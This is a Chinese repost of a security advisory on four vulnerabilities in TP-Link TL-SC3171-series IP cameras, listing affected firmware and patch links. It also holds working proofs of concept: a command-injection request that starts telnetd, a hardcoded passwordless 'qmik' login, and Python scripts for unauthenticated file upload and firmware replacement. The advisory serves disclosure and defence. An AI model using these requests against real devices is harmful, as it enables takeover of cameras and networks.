TP-Link网络摄像机的多个漏洞详细分析


发布人:admin分类:网络安全浏览量:84发布时间:2017-12-12

漏洞描述:

在TP-LinkTL-SC3171 IP Cameras网络摄像机的版本为LM.1.6.18P12_sign5的固件上发现多个漏洞,这些漏洞允许攻击者做如下的事情:

1:[CVE-2013-2578]通过文件 /cgi-bin/admin/servetest执行任意命令。

2:[CVE-2013-2579]用硬编码身份凭证的shell执行任意命令。

3:[CVE-2013-2580]执行未经身份认证的远程文件上传。

4:[CVE-2013-2581]执行未经身份认证的固件升级。

攻击路径:

通过结合这些漏洞,多个攻击路径可被利用。额外的攻击路径也是可用的,但这里的攻击路径可以让你了解攻击者如何危及受影响的的设备。

攻击路径1:

(验证:无)

1:通过[CVE-2013-2581]漏洞上传一个已经root的固件。

2:通过http://<ip-cam>/cgi-bin/reboot 重启设备。

攻击路径2:

(验证:绕过)

1:通过http://<ip-cam>/cgi-bin/hardfactorydefault将设备重置为出厂默认设置。之后,通过使用admin:admin作为有效的用户和密码绕过验证。

2:通过http://<ip-cam>/cgi-bin/reboot重启设备。

3:通过[CVE-2013-2578]漏洞开启Telnet服务。

4:使用用户qmik(没有密码)登陆Telnet服务,并使该设备作为枢轴点。

受影响的设备和固件:

TP-Link TL-SC3130 (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3130G (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3171 (固件版本M.1.6.18P12_sign5及以下)
TP-Link TL-SC3171G (固件版本LM.1.6.18P12_sign5及以下)

其他的TP-Link网络摄像机和固件版本可能也受影响。

供应商信息,解决方案和解决方法:

厂商提供的测试版修补固件版本链接如下:

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip

最终的正式版本将公布在未来数天,请联系TP-LINK了解更多信息。

技术细节说明和PoC:

1:servetest中的操作系统命令注入

[CVE-2013-2578]文件/cgi-bin/admin/servetest有几个参数可以被用于操作系统命令注入,这会导致通过身份验证的用户可以执行任意命令。下面的PoC启动telnet服务:

GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: <a href="http://192.168.1.100/progress.htm">http://192.168.1.100/progress.htm</a>
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2

2:telnet服务中的硬编码身份认证

[CVE-2013-2579]受影响的系统包含一个不需要密码的硬编码登录,这会导致远程攻击者使用这个内置的telnet服务来登录受影响设备的操作系统,用户和密码:

username: qmik
password: (none)

qmik用户被允许执行命令su,这会导致以root权限执行任意命令。telnet服务可以用通过[CVE-2013-2578]漏洞开启。

3:未经身份验证的远程文件上传

[CVE-2013-2580]文件/cgi-bin/uploadfile允许未经身份验证的用户进行远程文件上传,下面是Python PoC:

import requests
 
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("<a href="http://192.168.1.100/cgi-bin/uploadfile">http://192.168.1.100/cgi-bin/uploadfile</a>", files={fileName: open(fileName, "rb")})

上传文件(在本例中lala.tmp)将会被放置在/mnt/mtd目录中。

4:未经身份验证的远程固件升级

[CVE-2013-2581]文件/cgi-bin/firmwareupgrade允许未经身份验证的用户执行远程固件升级,PythonPoC如下:

import requests
 
requests.get("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>")
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("<a href="http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset">http://192.168.1.100/cgi-bin/firmwareupgrade?action=preset</a>", files={"SetFWFileName" : (fileName, open(fileName, "rb"))}, cookies=cookies)

引用:

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171. 
[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84. 
[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip. 
[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip. 
[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip. 
[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip. 

原文来自:http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other


被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

admin  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21390095(PV) 页面执行时间:46.142(MS)
  • xml
  • 网站地图